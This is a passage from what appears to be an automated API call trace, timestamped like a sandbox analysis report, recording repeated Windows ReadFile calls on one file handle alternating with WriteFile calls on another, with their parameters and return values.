lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.170] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x389, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.170] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.171] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.171] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.172] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.172] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ea, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.173] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.173] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.174] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.174] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.175] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.175] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.176] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.176] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.177] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.177] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.178] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.178] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.178] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.179] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.180] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.180] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x342, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.181] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.181] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.182] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.182] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.183] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.183] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.184] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.184] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.185] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.185] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.186] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.186] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.186] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.187] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x393, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.187] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.188] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.188] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.189] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.189] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.190] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.190] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.191] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.191] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.192] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.192] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.193] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.193] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.194] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.194] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.195] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.195] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.195] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.196] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.196] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.197] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.197] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.198] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.198] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.199] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.199] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x229, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.200] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.200] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x239, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.200] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.201] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x236, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.201] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.202] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.202] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.203] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.203] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.204] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.204] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.205] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.205] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.206] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.206] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.207] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x264, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.207] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.208] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.208] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.208] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.209] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.209] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.210] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.210] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x275, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.211] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.211] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x263, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.212] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.212] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.213] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.213] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.214] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.214] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.215] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.215] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.215] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.216] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.216] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.217] WriteFile (in: 